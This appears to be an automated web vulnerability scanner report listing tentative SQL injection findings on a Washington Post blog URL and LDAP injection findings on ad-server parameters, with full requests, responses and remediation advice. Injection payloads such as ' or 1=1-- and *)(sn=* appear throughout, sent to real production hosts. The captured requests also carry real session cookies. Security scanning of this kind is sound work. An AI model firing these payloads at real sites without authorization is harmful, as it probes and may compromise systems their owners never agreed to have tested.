The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. The payloads 12449423'%20or%201%3d1--%20 and 12449423'%20or%201%3d2--%20 were each submitted in the REST URL parameter 8. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html12449423'%20or%201%3d1--%20 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WPNIUCID=WPNI1304310786188.9974; rss_now=false; __qseg=Q_D|Q_T|Q_2919|Q_2917|Q_1665|Q_1656|Q_1647|Q_1645; s_pers=%20s_nr%3D1304310825793-New%7C1306902825793%3B%20s_lv%3D1304310825795%7C1398918825795%3B%20s_lv_s%3DFirst%2520Visit%7C1304312625795%3B%20s_vmonthnum%3D1306904400800%2526vn%253D1%7C1306904400800%3B%20s_monthinvisit%3Dtrue%7C1304312625800%3B; s_vi=[CS]v1|26DEF6EE05011508-40000100A0001105[CE]

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
ETag: d60de356-9576-4921-b120-36c06414da3f
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: no-cache, no-store, must-revalidate
Expires: Tue, 10 May 2011 13:16:19 GMT
Date: Tue, 10 May 2011 13:16:19 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 93297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<meta name="eomportal-id" content="13684742"/>
<meta name="eomportal-loid" content="5.1.1223112133"/>
<meta name="eomportal-uuid" content="b2b264d8-781c-11e0-b1ef-1ae6ee31db4e"/>
<meta name="eomportal-lastUpdate" content="Tue May 10 09:16:19 EDT 2011"/>
<meta name="keywords" content="snatorum,truce not about america,santorum debate"/>
<meta name="description" content="America isn&rsquo;t about his stance on social issues."/>
<meta name="DC.title" content="
Rick Santorum &lsquo;doesn&rsquo;t understand America&rsquo;
"/>
<meta name="DC.date.issued" content="2011-05-07"/>
<meta name="DC.creator" content="Jennifer Rubin"/>
<meta name="Content-Language" content="en-US"/>
<meta name="resource-type" content="document"/>
<link rel="stylesheet" type="text/css" href="/r/sites/twpweb/css/old/old-style.css"/>
<script type="text/javascript">

   //namespace object & initial time always set.
   var TWP_Debug = {};
   TWP_Debug.initialTime = new Date();
   TWP_Debug.pagedebug=(window.location.href.indexOf("pagedebug=true") > 0)?true:false;
   TWP_Debug.pagedebug && window.console && console.log && console.log('[' + (new Date()-TWP_Debug.initialTime)/1000 + ']' + ' frameset - start');

</script>
<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js"></script>
<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wp_ad.js"></script>
<script type="text/javascript">

   var siteContext = '/rw/sites/twpweb',
       sectionContext = '/blogs/right-turn',
       eidosBase = 'http://www.washingtonpost.com'
   ;
   TWP = window.TWP || {};
   TWP.base = 'http://media3.washingtonpost.com';
   TWP.eidosBase = eidosBase;

</script>
<script type="text/javascript">
<!--
           var commercialNode = 'opinions';
           var thisNode = 'opinions';
       // -->
       
</script>
<script type="text/javascript">

   wp_meta_data = {
       showAds:true,showPreRollAds:false,isHomepage: false,contentName:["right_turn"],page_id:["5.1.1223112133"],author:["Jennifer Rubin"],keywords:[
...[SNIP]...

Request 2

GET /blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html12449423'%20or%201%3d2--%20 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WPNIUCID=WPNI1304310786188.9974; rss_now=false; __qseg=Q_D|Q_T|Q_2919|Q_2917|Q_1665|Q_1656|Q_1647|Q_1645; s_pers=%20s_nr%3D1304310825793-New%7C1306902825793%3B%20s_lv%3D1304310825795%7C1398918825795%3B%20s_lv_s%3DFirst%2520Visit%7C1304312625795%3B%20s_vmonthnum%3D1306904400800%2526vn%253D1%7C1306904400800%3B%20s_monthinvisit%3Dtrue%7C1304312625800%3B; s_vi=[CS]v1|26DEF6EE05011508-40000100A0001105[CE]

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
ETag: 4c59412c-65cb-4871-ade3-da2220a18ed3
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: no-cache, no-store, must-revalidate
Expires: Tue, 10 May 2011 13:16:19 GMT
Date: Tue, 10 May 2011 13:16:19 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 93143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<meta name="eomportal-id" content="771352"/>
<meta name="eomportal-loid" content="5.1.1223112133"/>
<meta name="eomportal-uuid" content="b2b264d8-781c-11e0-b1ef-1ae6ee31db4e"/>
<meta name="eomportal-lastUpdate" content="Tue May 10 09:15:29 EDT 2011"/>
<meta name="keywords" content="snatorum,truce not about america,santorum debate"/>
<meta name="description" content="America isn&rsquo;t about his stance on social issues."/>
<meta name="DC.title" content="
Rick Santorum &lsquo;doesn&rsquo;t understand America&rsquo;
"/>
<meta name="DC.date.issued" content="2011-05-07"/>
<meta name="DC.creator" content="Jennifer Rubin"/>
<meta name="Content-Language" content="en-US"/>
<meta name="resource-type" content="document"/>
<link rel="stylesheet" type="text/css" href="/r/sites/twpweb/css/old/old-style.css"/>
<script type="text/javascript">

   //namespace object & initial time always set.
   var TWP_Debug = {};
   TWP_Debug.initialTime = new Date();
   TWP_Debug.pagedebug=(window.location.href.indexOf("pagedebug=true") > 0)?true:false;
   TWP_Debug.pagedebug && window.console && console.log && console.log('[' + (new Date()-TWP_Debug.initialTime)/1000 + ']' + ' frameset - start');

</script>
<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js"></script>
<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wp_ad.js"></script>
<script type="text/javascript">

   var siteContext = '/rw/sites/twpweb',
       sectionContext = '/blogs/right-turn',
       eidosBase = 'http://www.washingtonpost.com'
   ;
   TWP = window.TWP || {};
   TWP.base = 'http://media3.washingtonpost.com';
   TWP.eidosBase = eidosBase;

</script>
<script type="text/javascript">
<!--
           var commercialNode = 'opinions';
           var thisNode = 'opinions';
       // -->
       
</script>
<script type="text/javascript">

   wp_meta_data = {
       showAds:true,showPreRollAds:false,isHomepage: false,contentName:["right_turn"],page_id:["5.1.1223112133"],author:["Jennifer Rubin"],keywords:["s
...[SNIP]...

1.29. http://www.washingtonpost.com/blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.washingtonpost.com
Path:   /blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 19589935%20or%201%3d1--%20 and 19589935%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html?119589935%20or%201%3d1--%20=1 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WPNIUCID=WPNI1304310786188.9974; s_vi=[CS]v1|26DEF6EE05011508-40000100A0001105[CE]; s_pers=%20s_nr%3D1305033204715-Repeat%7C1307625204715%3B%20s_lv%3D1305033204717%7C1399641204717%3B%20s_lv_s%3DMore%2520than%25207%2520days%7C1305035004717%3B%20s_vmonthnum%3D1306904400800%2526vn%253D2%7C1306904400800%3B%20s_monthinvisit%3Dtrue%7C1305035004721%3B%20gvp_p5%3Dopinions%253Ablog%253Aright-turn%2520-%2520AFHhSbBG%2520-%252020110506%2520-%2520rick-santorum-doesnt-understand-america%7C1305035004728%3B; s_sess=%20s_cc%3Dtrue%3B%20s_dslv%3DMore%2520than%25207%2520days%3B%20s_wp_ep%3Dblog%3B%20s._ref%3DDirect-Load%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2919|Q_1807|Q_1665|Q_1649|Q_1648|Q_1645; rss_now=false; wpni_poe=true; popUpClockCookie=1; popUpOnPreviousPageCookie=true; wp_pageview=1; mbox=check#true#1305033270|session#1305033209163-998563#1305035070; headzip=20001

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
ETag: b793f480-3c16-4fd5-b0eb-c7dfa68cbcad
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: no-cache, no-store, must-revalidate
Expires: Tue, 10 May 2011 13:19:17 GMT
Date: Tue, 10 May 2011 13:19:17 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 93143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<meta name="eomportal-id" content="771352"/>
<meta name="eomportal-loid" content="5.1.1223112133"/>
<meta name="eomportal-uuid" content="b2b264d8-781c-11e0-b1ef-1ae6ee31db4e"/>
<meta name="eomportal-lastUpdate" content="Tue May 10 09:17:28 EDT 2011"/>
<meta name="keywords" content="snatorum,truce not about america,santorum debate"/>
<meta name="description" content="America isn&rsquo;t about his stance on social issues."/>
<meta name="DC.title" content="
Rick Santorum &lsquo;doesn&rsquo;t understand America&rsquo;
"/>
<meta name="DC.date.issued" content="2011-05-07"/>
<meta name="DC.creator" content="Jennifer Rubin"/>
<meta name="Content-Language" content="en-US"/>
<meta name="resource-type" content="document"/>
<link rel="stylesheet" type="text/css" href="/r/sites/twpweb/css/old/old-style.css"/>
<script type="text/javascript">

   //namespace object & initial time always set.
   var TWP_Debug = {};
   TWP_Debug.initialTime = new Date();
   TWP_Debug.pagedebug=(window.location.href.indexOf("pagedebug=true") > 0)?true:false;
   TWP_Debug.pagedebug && window.console && console.log && console.log('[' + (new Date()-TWP_Debug.initialTime)/1000 + ']' + ' frameset - start');

</script>
<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js"></script>
<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wp_ad.js"></script>
<script type="text/javascript">

   var siteContext = '/rw/sites/twpweb',
       sectionContext = '/blogs/right-turn',
       eidosBase = 'http://www.washingtonpost.com'
   ;
   TWP = window.TWP || {};
   TWP.base = 'http://media3.washingtonpost.com';
   TWP.eidosBase = eidosBase;

</script>
<script type="text/javascript">
<!--
           var commercialNode = 'opinions';
           var thisNode = 'opinions';
       // -->
       
</script>
<script type="text/javascript">

   wp_meta_data = {
       showAds:true,showPreRollAds:false,isHomepage: false,contentName:["right_turn"],page_id:["5.1.1223112133"],author:["Jennifer Rubin"],keywords:["s
...[SNIP]...

Request 2

GET /blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html?119589935%20or%201%3d2--%20=1 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WPNIUCID=WPNI1304310786188.9974; s_vi=[CS]v1|26DEF6EE05011508-40000100A0001105[CE]; s_pers=%20s_nr%3D1305033204715-Repeat%7C1307625204715%3B%20s_lv%3D1305033204717%7C1399641204717%3B%20s_lv_s%3DMore%2520than%25207%2520days%7C1305035004717%3B%20s_vmonthnum%3D1306904400800%2526vn%253D2%7C1306904400800%3B%20s_monthinvisit%3Dtrue%7C1305035004721%3B%20gvp_p5%3Dopinions%253Ablog%253Aright-turn%2520-%2520AFHhSbBG%2520-%252020110506%2520-%2520rick-santorum-doesnt-understand-america%7C1305035004728%3B; s_sess=%20s_cc%3Dtrue%3B%20s_dslv%3DMore%2520than%25207%2520days%3B%20s_wp_ep%3Dblog%3B%20s._ref%3DDirect-Load%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2919|Q_1807|Q_1665|Q_1649|Q_1648|Q_1645; rss_now=false; wpni_poe=true; popUpClockCookie=1; popUpOnPreviousPageCookie=true; wp_pageview=1; mbox=check#true#1305033270|session#1305033209163-998563#1305035070; headzip=20001

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
ETag: 155d7a29-1267-4b25-8e8f-29d8c9c7cab0
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: no-cache, no-store, must-revalidate
Expires: Tue, 10 May 2011 13:19:17 GMT
Date: Tue, 10 May 2011 13:19:17 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 93297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<meta name="eomportal-id" content="13696988"/>
<meta name="eomportal-loid" content="5.1.1223112133"/>
<meta name="eomportal-uuid" content="b2b264d8-781c-11e0-b1ef-1ae6ee31db4e"/>
<meta name="eomportal-lastUpdate" content="Tue May 10 09:19:16 EDT 2011"/>
<meta name="keywords" content="snatorum,truce not about america,santorum debate"/>
<meta name="description" content="America isn&rsquo;t about his stance on social issues."/>
<meta name="DC.title" content="
Rick Santorum &lsquo;doesn&rsquo;t understand America&rsquo;
"/>
<meta name="DC.date.issued" content="2011-05-07"/>
<meta name="DC.creator" content="Jennifer Rubin"/>
<meta name="Content-Language" content="en-US"/>
<meta name="resource-type" content="document"/>
<link rel="stylesheet" type="text/css" href="/r/sites/twpweb/css/old/old-style.css"/>
<script type="text/javascript">

   //namespace object & initial time always set.
   var TWP_Debug = {};
   TWP_Debug.initialTime = new Date();
   TWP_Debug.pagedebug=(window.location.href.indexOf("pagedebug=true") > 0)?true:false;
   TWP_Debug.pagedebug && window.console && console.log && console.log('[' + (new Date()-TWP_Debug.initialTime)/1000 + ']' + ' frameset - start');

</script>
<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js"></script>
<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wp_ad.js"></script>
<script type="text/javascript">

   var siteContext = '/rw/sites/twpweb',
       sectionContext = '/blogs/right-turn',
       eidosBase = 'http://www.washingtonpost.com'
   ;
   TWP = window.TWP || {};
   TWP.base = 'http://media3.washingtonpost.com';
   TWP.eidosBase = eidosBase;

</script>
<script type="text/javascript">
<!--
           var commercialNode = 'opinions';
           var thisNode = 'opinions';
       // -->
       
</script>
<script type="text/javascript">

   wp_meta_data = {
       showAds:true,showPreRollAds:false,isHomepage: false,contentName:["right_turn"],page_id:["5.1.1223112133"],author:["Jennifer Rubin"],keywords:[
...[SNIP]...

2. LDAP injection  previous  next
There are 7 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://a.tribalfusion.com/j.ad [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The p parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the p parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /j.ad?site=gathercom&adSpace=ros&tagKey=2218970080&th=22778850880&tKey=undefined&size=300x250&p=*)(sn=*&a=1&flashVer=10&ver=1.20&center=1&url=http%3A%2F%2Fpolitics.gather.com%2FviewArticle.action%3FarticleId%3D281474979309848&f=0&rnd=13173106 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://politics.gather.com/viewArticle.action?articleId=281474979309848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=alnEcatZdPcFFUL1prcLuevBTL0REIqDHaUTcrvQj66Ym2UNtCRVCmf6Ory5qQs8fY2btrH0TfL5oWbJdFSUb6ZaZcHENnAhr0c8IZcTZbsVMRid4B1ihve2fCaRXkydIFR4sCyGd7wxPARZcZa0METWMphfr0KZbBI9hZasccLBZa3ZcuZaiIMWO3V82XcWkmZbtk2UOi4fX9ZaguZaARZcNsm3bJpTtk0wJ7yOHQTwyrUhW3NcKDpwPwuZarDZahVyV166PqZalIp98ZcnA9WddAThdZcTOeBWZdMjOEW9wE4hNR3HrxyQ06acZcFZbuZaTL1r7pLTwgDRJBaG8UWfAP3jR5bV4HgPpZdovQdtJP8iZcmocSNPUqmWL4vZadYpuMaWCfVZaH2bwZb6Bpu9TNdIogDceb4IYVofUEpvGWJTZcqdoWIojT00SyN3tL98ZbEFgVQpyUAGgQTT0Zbc9KtLVyVPH8x7oFICvcgYoBbog9Bc5vZbIMcZd5kZdZbaQCEu1PttAV7DXoKoL6tEfJa883EaDC432ywNwJommsT9Zc9tERtVF4ochqNfHPlGgM8ykwVFewTTEOk5DqkIbBRFeY4HwD

Response 1

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=apnJHNRkPN7RT05AbLMZasF4kthqofPxfYY6LgEBtZaBeHoZc2tfxoKxMy3vC8oMjPhBZb4pSMNoNr2EZbopX1F5FnoFEJiaSmJSLNZcu2irXTf7n1Ihuyd0HZc8ZbcuoHPDktEr92raYU652ZcZaIVENlAiNpNJ7RtRud88xGyya1ZbaqRSZcAJOY0k217bFoSyLJJQfMnXFZcX9ZcYqRKRoY6ivoXZcpVx3WTDhP8rAiHaAysedxPyJZdrLJxZalQLG7LZdApoHepI5f8cus2oQaLhZdZaIbXHylfGRSfyFZaUdleBVM9IGuw0yluHdbkxJOquK1gSSZcVWg36Zcn7pFRNDagoYwQlaqGr2FSiZbOQRRC9ZcIg7bjZbNV13I43RUbMcnZbwNgSLUZcU7GEAsZagyysYncFctFZdMZaDgNuZckpuMWQmSobYp1uCOZcHorZc635BkwOqbH0eaefa7d4ENuOOAyLWUdm2GLJgZaVD978RvmnNZdmmjXUDpbBcxU8KFno92goB5r7nAYtUlxLhebqg0v0gZapF4OZadNVvO8BAeY7fGTjID55C4LCRuSmWgua3gK8OeWXbyS0qxZclElFjd71PX1Svvvsxx0G4SZagUQeco2rfclOL23tahKv8STZbXAbpYg3rjmrF4L15; path=/; domain=.tribalfusion.com; expires=Mon, 08-Aug-2011 13:24:37 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 383

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/aomNnAT6rp3G32XUnLTPip26QhQAFE4WUq0HUZbnW2u3PZbS3GrgUsU8VGB8R6FvWdUWUFFS3betWqjpTaFbSaYFSGQIRr6wRW7aVGfQ2FTvmWqrXaPp2tUEPVfH2mYZamWEoTHjcXrfiXFji1EesRFrBWFBS0EUio9ZaFRK/http://www.LetsMove.gov"><img src="http://cdn5.tribalfusion.com/media/2467856.gif" border=0 height=250 width=300 ><\/a><\/center>');

Request 2

GET /j.ad?site=gathercom&adSpace=ros&tagKey=2218970080&th=22778850880&tKey=undefined&size=300x250&p=*)!(sn=*&a=1&flashVer=10&ver=1.20&center=1&url=http%3A%2F%2Fpolitics.gather.com%2FviewArticle.action%3FarticleId%3D281474979309848&f=0&rnd=13173106 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://politics.gather.com/viewArticle.action?articleId=281474979309848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=alnEcatZdPcFFUL1prcLuevBTL0REIqDHaUTcrvQj66Ym2UNtCRVCmf6Ory5qQs8fY2btrH0TfL5oWbJdFSUb6ZaZcHENnAhr0c8IZcTZbsVMRid4B1ihve2fCaRXkydIFR4sCyGd7wxPARZcZa0METWMphfr0KZbBI9hZasccLBZa3ZcuZaiIMWO3V82XcWkmZbtk2UOi4fX9ZaguZaARZcNsm3bJpTtk0wJ7yOHQTwyrUhW3NcKDpwPwuZarDZahVyV166PqZalIp98ZcnA9WddAThdZcTOeBWZdMjOEW9wE4hNR3HrxyQ06acZcFZbuZaTL1r7pLTwgDRJBaG8UWfAP3jR5bV4HgPpZdovQdtJP8iZcmocSNPUqmWL4vZadYpuMaWCfVZaH2bwZb6Bpu9TNdIogDceb4IYVofUEpvGWJTZcqdoWIojT00SyN3tL98ZbEFgVQpyUAGgQTT0Zbc9KtLVyVPH8x7oFICvcgYoBbog9Bc5vZbIMcZd5kZdZbaQCEu1PttAV7DXoKoL6tEfJa883EaDC432ywNwJommsT9Zc9tERtVF4ochqNfHPlGgM8ykwVFewTTEOk5DqkIbBRFeY4HwD

Response 2

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=a6nK5SMZaA2iB6Zc57bM520swZdPOEPdARrg0QlPZaN4RsyOlqNcO356S0HWhDBZd3iqbAPX1eW2IPLTq4rxOMmPwkm4q2fsMZby8ZdVlUZc8wsWPxme7n98YU263p7YkZbOjCZab7TvZbTTAhhKCTEjpUWgQIQfJt40SnKAH4cCFCM1mpwbyh6ESSr39LSwQmopXjmBdrMTf1nhK9jMi2cmtYOcMVh0sxUA9NTWaSLwgTp5Zcuq1kYnvWZdlXNUfZc18dVNRS40dPOPUXB83dZa0A6FFt6s44ejRs8pPD0x6ZaCvpgqjTqjexLIVZbWmpQD59ZbS9Zc31lFv4MgS8qfyu9BnHFKZdF2XHcoc5rs0UrLACpup6G4FMhWeYZcPfh4qJgCsRvSd6udOZb8ZbbCYRRsmtVGZdZacZbZaDjDpDDwAJt0QQ5bZa7OOkGuZbWwJ12DrqxadVSGweqF86Ekm0TtDJZaOflYcgY43fFSuoDDsCKU4ypp9xlOZai8XkAYUIWc5CD1RCP0kWkNA90Dg1nMqZb5gJ3NGF9mnnjm7fXZdptbViI9GhVx7Hb4bq0eteY15hhukdh6RHCae4yQ0KIE8ohoxn5cRWSLUiZdO0w3n6xYDMUK8boeu6l4Ja4sN5xbfaVhVkIBuSDcnrMieTg4gs; path=/; domain=.tribalfusion.com; expires=Mon, 08-Aug-2011 13:24:38 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 393

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/a4mNnAprrEYsrSYcv40cvupab32FZbRTFfFWPrYPqb1SVBtSHZbr0dbtWAYp2GB40U3JTATu5mM7P6MA4dBrXdYAnt2u36Y05Vj8UsF9UcJ6R6FuUtM3UbZb12rApUqMoTaU7QEMISGQAQbZasSdMdWsYS2U6xyTeEn4VGpO/http://www.fightarthritispain.org"><img src="http://cdn5.tribalfusion.com/media/2467796.gif" border=0 height=250 width=300 ><\/a><\/center>');

2.2. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The pid parameter appears to be vulnerable to LDAP injection attacks.

The payloads 1d130a381bb27744)(sn=* and 1d130a381bb27744)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /bmx3/broker.pli?pid=1d130a381bb27744)(sn=*&PRAd=253732016&AR_C=207615354 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=43&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:38:16 2011&prad=242390407&arc=206438258&; UID=875e3f1e-184.84.247.65-1303349046

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 10 May 2011 13:42:08 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_1d130a381bb27744&#41;&#40;sn=exp=1&initExp=Tue May 10 13:42:08 2011&recExp=Tue May 10 13:42:08 2011&prad=253732016&arc=207615354&; expires=Mon 08-Aug-2011 13:42:08 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305034928; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
